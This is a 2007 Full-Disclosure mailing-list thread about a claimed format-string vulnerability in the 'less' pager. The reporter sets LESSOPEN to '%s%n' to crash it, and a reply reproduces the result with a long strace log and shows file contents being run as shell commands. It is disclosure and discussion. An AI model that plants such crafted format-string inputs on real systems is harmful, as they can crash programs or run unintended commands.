It's taking arguments out of your environment for the format string, put a couple more %n's and watch it die horribly. That's why I said "a meager demonstration." The emphasis was definitely on meager ;)
On 10/31/07, Jeffrey Denton <[EMAIL PROTECTED]> wrote: > On 10/31/07, glopeda. com <[EMAIL PROTECTED]> wrote: > > From: [EMAIL PROTECTED] > > Application: less 394 and prior > > Type: Format strings vulnerability > > Priority: Low > > > Meager demonstration: > > $ export LESSOPEN=%s%n > > $ less somefile > > Segmentation fault > > $ > > Interesting... > > $ echo $LESSOPEN > |lesspipe.sh %s > $ export LESSOPEN=%s%n > $ less iptraf.txt > /bin/bash: ./iptraf.txt: Permission denied > : No such file or directory > $ less --version > less 394 > Copyright (C) 1984-2005 Mark Nudelman > > less comes with NO WARRANTY, to the extent permitted by law. > For information about the terms of redistribution, > see the file named README in the less distribution. > Homepage: http://www.greenwoodsoftware.com/less > $ id > uid=1000(dentonj) gid=100(users) > groups=11(floppy),17(audio),18(video),19(cdrom),83(plugdev),100(users) > $ ls -l iptraf.txt > -rw-r--r-- 1 dentonj users 300 2007-10-25 08:04 iptraf.txt > $ echo $LESSOPEN > %s%n > $ cat /etc/slackware-version > Slackware 12.0.0 > > $ strace /usr/bin/less iptraf.txt > execve("/usr/bin/less", ["/usr/bin/less", "iptraf.txt"], [/* 47 vars */]) = 0 > brk(0) = 0x8065000 > mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, > 0) = 0xb7efb000 > access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or > directory) > open("/etc/ld.so.cache", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=111039, ...}) = 0 > mmap2(NULL, 111039, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7edf000 > close(3) = 0 > open("/lib/libncursesw.so.5", O_RDONLY) = 3 > read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\352"..., 512) = > 512 > fstat64(3, {st_mode=S_IFREG|0755, st_size=309276, ...}) = 0 > mmap2(NULL, 311172, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, > 0) = 0xb7e93000 > mmap2(0xb7ed7000, 32768, PROT_READ|PROT_WRITE, > MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x43) = 0xb7ed7000 > close(3) = 0 > open("/lib/libc.so.6", O_RDONLY) = 3 > read(3, "[EMAIL PROTECTED]"..., 512) = 512 > fstat64(3, {st_mode=S_IFREG|0755, st_size=1528742, ...}) = 0 > mmap2(NULL, 1316260, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, > 3, 0) = 0xb7d51000 > mmap2(0xb7e8d000, 12288, PROT_READ|PROT_WRITE, > MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13c) = 0xb7e8d000 > mmap2(0xb7e90000, 9636, PROT_READ|PROT_WRITE, > MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e90000 > close(3) = 0 > open("/lib/libdl.so.2", O_RDONLY) = 3 > read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0P\n\0\000"..., > 512) = 512 > fstat64(3, {st_mode=S_IFREG|0755, st_size=13506, ...}) = 0 > mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, > 0) = 0xb7d4d000 > mmap2(0xb7d4f000, 8192, PROT_READ|PROT_WRITE, > MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1) = 0xb7d4f000 > close(3) = 0 > mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, > 0) = 0xb7d4c000 > set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d4c8d0, > limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, > limit_in_pages:1, seg_not_present:0, useable:1}) = 0 > mprotect(0xb7e8d000, 4096, PROT_READ) = 0 > munmap(0xb7edf000, 111039) = 0 > ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) > = 0 > ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) > = 0 > brk(0) = 0x8065000 > brk(0x8086000) = 0x8086000 > stat64("/home/dentonj/.terminfo", 0xbfc67624) = -1 ENOENT (No such > file or directory) > stat64("/usr/share/terminfo", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 > access("/usr/share/terminfo/x/xterm", R_OK) = 0 > open("/usr/share/terminfo/x/xterm", O_RDONLY|O_LARGEFILE) = 3 > read(3, "\32\0010\0&\0\17\0\235\1F\5xterm|xterm terminal"..., 4097) = 2522 > close(3) = 0 > ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) > = 0 > ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) > = 0 > ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) > = 0 > ioctl(1, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0 > ioctl(2, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0 > open("/usr/bin/.sysless", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such > file or directory) > open("/etc/sysless", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file > or directory) > open("/home/dentonj/.less", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such > file or directory) > open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = -1 > ENOENT (No such file or directory) > open("/usr/share/locale/locale.alias", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=2586, ...}) = 0 > mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, > 0) = 0xb7efa000 > read(3, "# Locale name alias data base.\n#"..., 4096) = 2586 > read(3, "", 4096) = 0 > close(3) = 0 > munmap(0xb7efa000, 4096) = 0 > open("/usr/lib/locale/en_US/LC_IDENTIFICATION", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=378, ...}) = 0 > mmap2(NULL, 378, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7efa000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_MEASUREMENT", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=28, ...}) = 0 > mmap2(NULL, 28, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef9000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_TELEPHONE", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=64, ...}) = 0 > mmap2(NULL, 64, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef8000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_ADDRESS", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=160, ...}) = 0 > mmap2(NULL, 160, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef7000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_NAME", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=82, ...}) = 0 > mmap2(NULL, 82, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef6000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_PAPER", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=39, ...}) = 0 > mmap2(NULL, 39, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef5000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_MESSAGES", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_MESSAGES/SYS_LC_MESSAGES", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=57, ...}) = 0 > mmap2(NULL, 57, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef4000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_MONETARY", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=291, ...}) = 0 > mmap2(NULL, 291, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef3000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_TIME", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=2459, ...}) = 0 > mmap2(NULL, 2459, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef2000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_NUMERIC", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=59, ...}) = 0 > mmap2(NULL, 59, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef1000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_CTYPE", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=207720, ...}) = 0 > mmap2(NULL, 207720, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7d19000 > close(3) = 0 > open("/home/dentonj/.lesshst", O_RDONLY|O_LARGEFILE) = 3 > fstat64(3, {st_mode=S_IFREG|0600, st_size=54, ...}) = 0 > mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, > 0) = 0xb7ef0000 > read(3, ".less-history-file:\n.search\n\"rc\n"..., 4096) = 54 > read(3, "", 4096) = 0 > close(3) = 0 > munmap(0xb7ef0000, 4096) = 0 > open("/dev/tty", O_RDONLY|O_LARGEFILE) = 3 > ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) > = 0 > fsync(3) = -1 EINVAL (Invalid argument) > ioctl(3, SNDCTL_TMR_STOP or TCSETSW, {B38400 opost isig -icanon -echo ...}) = > 0 > rt_sigaction(SIGINT, {0x805a220, [INT], SA_RESTART}, {SIG_DFL}, 8) = 0 > rt_sigaction(SIGTSTP, {0x805a260, [TSTP], SA_RESTART}, {SIG_DFL}, 8) = 0 > rt_sigaction(SIGWINCH, {0x805a2a0, [WINCH], SA_RESTART}, {SIG_DFL}, 8) = 0 > pipe([4, 5]) = 0 > clone(child_stack=0, > flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, > child_tidptr=0xb7d4c918) = 10823 > close(5) = 0 > fstat64(4, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0 > mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, > 0) = 0xb7ef0000 > read(4, /bin/bash: ./iptraf.txt: Permission denied > "", 1024) = 0 > close(4) = 0 > waitpid(10823, [{WIFEXITED(s) && WEXITSTATUS(s) == 126}], 0) = 10823 > --- SIGCHLD (Child exited) @ 0 (0) --- > munmap(0xb7ef0000, 4096) = 0 > stat64(" > ", 0xbfc68e10) = -1 ENOENT (No such file or directory) > stat64(" > ", 0xbfc68e90) = -1 ENOENT (No such file or directory) > open("/usr/share/locale/en_US/LC_MESSAGES/libc.mo", O_RDONLY) = -1 > ENOENT (No such file or directory) > open("/usr/share/locale/en/LC_MESSAGES/libc.mo", O_RDONLY) = -1 ENOENT > (No such file or directory) > open("/home/dentonj/.lesshst", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 4 > fchmod(4, 0600) = 0 > fstat64(4, {st_mode=S_IFREG|0600, st_size=0, ...}) = 0 > mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, > 0) = 0xb7ef0000 > write(4, ".less-history-file:\n.search\n\"rc\n"..., 54) = 54 > close(4) = 0 > munmap(0xb7ef0000, 4096) = 0 > write(2, "\n: No such file or directory\n", 29 > : No such file or directory > ) = 29 > fsync(3) = -1 EINVAL (Invalid argument) > ioctl(3, SNDCTL_TMR_STOP or TCSETSW, {B38400 opost isig icanon echo ...}) = 0 > exit_group(1) = ? > Process 10822 detached > $ > > $ chmod 755 iptraf.txt > $ less iptraf.txt > ./iptraf.txt: line 1: 10.1.1.1:33073: command not found > ./iptraf.txt: line 2: 10.1.1.2:54356: command not found > . . . > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Site: http://www.glopeda.com E-mail: [EMAIL PROTECTED] Name: Mitch _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
